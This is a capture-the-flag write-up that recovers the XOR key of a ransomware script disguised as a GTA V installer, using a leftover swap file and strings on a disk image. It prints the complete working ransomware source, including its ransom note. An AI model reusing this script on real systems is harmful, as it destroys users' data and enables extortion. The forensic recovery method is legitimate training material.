Pas Un Bon Nom
Difficulté : Facile
Énoncé
J’étais là tranquillou sur mon PC, m’voyez ? Je télécharge des films et tout, m’voyez ? Et alors il y a ce message étrange que je dois payer Dogecoin pour > déchiffrer mes données. Je ne l’ai pas fait… donc maintenant mes données sont chiffrées :( Donc tiens, prends le disque dur, c’est pas comme si il était utile maintenant… Sauf si c’était possible de retrouver la clé utilisée par ce méchant hacker, m’voyez ? S’il te plaiiiit ? Tu serais adorable merci !
Solve
Mount the vmdk :
1
2
3
|
sudo modprobe nbd
sudo qemu-nbd -r -c /dev/nbd1 ./PC-jeanne-disk002.vmdk
mount -o ro,noload /dev/nbd1p1 /mnt/tmp
|
Solve 1
We have a file that allows us to know the type of encryption (here XOR):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
|
cat home/jeanne/GTA_V_installer.py
#!/bin/python3
import os
import fileinput
import sys
main_folder = "./"
def encryptDecrypt(inpDataBytes):
# Define XOR key
keyLength = len(xorKey)
# calculate length of input string
length = len(inpDataBytes)
# perform XOR operation of key
# with every byte
for i in range(length):
inpDataBytes[i] = inpDataBytes[i] ^ ord(xorKey[i % keyLength])
return inpDataBytes
if __name__ == '__main__':
# list all the files in the main folder, and its subfolders
#list_of_files = [main_folder + f for f in os.listdir(main_folder) if os.path.isfile(main_folder + f) and not f.startswith('.')]
list_of_files = []
for root, dirs, files in os.walk(main_folder):
for file in files:
if not '/.' in os.path.join(root, file):
# get the file name
list_of_files.append(os.path.join(root, file))
print(list_of_files)
print("\n")
xorKey = input("Enter the key you received after following the instructions in READ_TO_RETRIEVE_YOUR_DATA.txt: ")
for file in list_of_files:
if "GTA_V_installer.py" not in file:
with open(file, 'rb') as f:
data = bytearray(f.read())
print("data : " + str(data) + "\n")
encrypted_data = encryptDecrypt(data)
print("encrypted : " + str(encrypted_data) + "\n")
with open(file, 'wb') as f:
f.write(encrypted_data)
# Create a READ_TO_RETRIEVE_YOUR_DATA.txt file
with open(main_folder + "READ_TO_RETRIEVE_YOUR_DATA.txt", 'w') as f:
f.write("Your PC is now encrypted.\nThe only way you may retrieve your data is by sending 1000 Bitcoins to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\n")
f.write("Add a message to the Bitcoin transfer with your email address.\nThe code to decrypt your data will be sent automatically to this email.\n")
f.write("Once you get this code, simply run \"python GTA_V_installer.py\" and input your code.\n")
f.write("I'm very sorry for the inconvenience. I need to feed my family.\n")
f.write("HODL.\n")
# I replace the line where the key is defined, that way I can use the same script for decryption without leaving any trace of the key
is_edited = False
for line in fileinput.input("./GTA_V_installer.py", inplace=1):
if "xorKey = " in line and not is_edited:
line = " xorKey = input(\"Enter the key you received after following the instructions in READ_TO_RETRIEVE_YOUR_DATA.txt: \")\n"
is_edited = True
sys.stdout.write(line)
|
The objective is therefore going to be to find the key to decipher.
After looking in the logs, the bash_history, etc… We find nothing special allowing us to decipher the documents.
However, if we look in the documents :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
ls -al home/jeanne/Documents/
total 72
drwxr-xr-x 2 zarkyo zarkyo 4096 14 oct. 12:29 .
drwxr-x--- 13 zarkyo zarkyo 4096 14 oct. 12:31 ..
-rw-rw-r-- 1 zarkyo zarkyo 1116 14 oct. 12:31 2019_Q1_report.txt
-rw-rw-r-- 1 zarkyo zarkyo 994 14 oct. 12:31 2019_Q2_report.txt
-rw-rw-r-- 1 zarkyo zarkyo 1011 14 oct. 12:31 2019_Q3_report.txt
-rw-rw-r-- 1 zarkyo zarkyo 1260 14 oct. 12:31 2019_Q4_report.txt
-rw-rw-r-- 1 zarkyo zarkyo 1343 14 oct. 12:31 2020_Q1_report.txt
-rw-rw-r-- 1 zarkyo zarkyo 1264 14 oct. 12:31 2020_Q2_report.txt
-rw-rw-r-- 1 zarkyo zarkyo 1265 14 oct. 12:31 2020_Q3_report.txt
-rw-rw-r-- 1 zarkyo zarkyo 1347 14 oct. 12:31 2020_Q4_report.txt
-rw-rw-r-- 1 zarkyo zarkyo 1468 14 oct. 12:31 2021_Q1_report.txt
-rw-r--r-- 1 zarkyo zarkyo 12288 14 oct. 12:29 .2021_Q1_report.txt.swp
-rw-rw-r-- 1 zarkyo zarkyo 1289 14 oct. 12:31 2021_Q2_report.txt
-rw-rw-r-- 1 zarkyo zarkyo 1407 14 oct. 12:31 2021_Q3_report.txt
-rw-rw-r-- 1 zarkyo zarkyo 1447 14 oct. 12:31 2021_Q4_report.txt
-rw-rw-r-- 1 zarkyo zarkyo 1434 14 oct. 12:31 2022_Q1_report.txt
|
We notice the hidden file .2021_Q1_report.txt.swp which is not encrypted. We also have its encrypted version 2021_Q1_report.txt
To get the key just cipher XOR plain
We will take our encrypted file, transform it into hexa (Cyberchef), then in dcode we provide our hex obtained at the moment as well as this ASCII key: In Q1, we achieved our highest ever vehicle production and deliveries. This was in s
we get base64 at the beginning of our result
1
2
|
echo 'REdIQUNLezdIMTVfMVNfN0gzX0szWV9HMVYzTl83MF83SDNfR1RBX1ZfUjRONTBNVzRSM19WMUM3MU01fQo=' | base64 -d
DGHACK{7H15_1S_7H3_K3Y_G1V3N_70_7H3_GTA_V_R4N50MW4R3_V1C71M5}
|
Unmount the vmdk :
1
2
|
umount mnt tmp
qemu-nbd -r -d /dev/nbd1
|
Solve 2
1
2
3
4
|
strings * | grep -ari "xor" | more
[...]
n\n xorKey = \"REdIQUNLezdIMTVfMVNfN0gzX0szWV9HMVYzTl83MF83SDNfR1RBX1ZfUjRONTBNVzRSM19WMUM3MU01fQo=\"\n\n for file in list_of_files:\n if \"GTA_V_installer.py\" not in file:\n with open(file, 'rb') as f:\n
[...]
|
The key in base64 format appears at the beginning of the result
1
2
|
echo 'REdIQUNLezdIMTVfMVNfN0gzX0szWV9HMVYzTl83MF83SDNfR1RBX1ZfUjRONTBNVzRSM19WMUM3MU01fQo=' | base64 -d
DGHACK{7H15_1S_7H3_K3Y_G1V3N_70_7H3_GTA_V_R4N50MW4R3_V1C71M5}
|
Flag : DGHACK{7H15_1S_7H3_K3Y_G1V3N_70_7H3_GTA_V_R4N50MW4R3_V1C71M5}
